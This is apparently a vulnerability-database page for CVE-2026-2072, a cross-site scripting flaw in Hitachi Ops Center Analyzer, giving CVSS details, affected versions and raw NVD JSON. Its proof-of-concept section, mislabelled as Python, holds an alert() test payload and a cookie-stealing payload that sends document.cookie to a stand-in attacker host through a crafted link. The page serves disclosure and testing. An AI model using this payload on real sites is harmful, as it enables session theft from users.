Security Vulnerability Report
中文
CVE-2026-2072 CVSS 8.2 HIGH

CVE-2026-2072

Published: 2026-03-25 03:16:06
Last Modified: 2026-03-25 15:41:34

Description

Cross-Site Scripting vulnerability in Hitachi Infrastructure Analytics Advisor (Analytics probe component), Hitachi Ops Center Analyzer.This issue affects Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.5-00.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Hitachi Infrastructure Analytics Advisor (受影响版本未明确,需查阅厂商公告)
Hitachi Ops Center Analyzer 10.0.0-00 至 11.0.5-00 之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Proof of Concept (PoC) for CVE-2026-2072 // This PoC demonstrates a potential Reflected XSS payload. // Attackers need to find the specific vulnerable endpoint parameter. // Sample malicious payload to test script execution var payload = "<script>alert('CVE-2026-2072_Vulnerable');<\/script>"; // Advanced payload: Stealing session cookies var stealPayload = "<img src=x onerror='fetch(\"https://attacker-controlled.com/log?c=\"+document.cookie)'>"; // Construct the attack URL (Example) // The attacker sends this URL to a victim with low privileges (PR:L) var target = "https://target-hitachi-server/analytics/probe"; var attackUrl = target + "?vulnerable_param=" + encodeURIComponent(stealPayload); console.log("Exploit Link: " + attackUrl);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2072", "sourceIdentifier": "[email protected]", "published": "2026-03-25T03:16:05.850", "lastModified": "2026-03-25T15:41:33.977", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting vulnerability in Hitachi Infrastructure Analytics Advisor (Analytics probe component), Hitachi Ops Center Analyzer.This issue affects Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.5-00."}, {"lang": "es", "value": "Vulnerabilidad de cross-site scripting en Hitachi Infrastructure Analytics Advisor (componente Analytics probe), Hitachi Ops Center Analyzer. Este problema afecta a Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: desde 10.0.0-00 anterior a 11.0.5-00."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-114/index.html", "source": "[email protected]"}]}}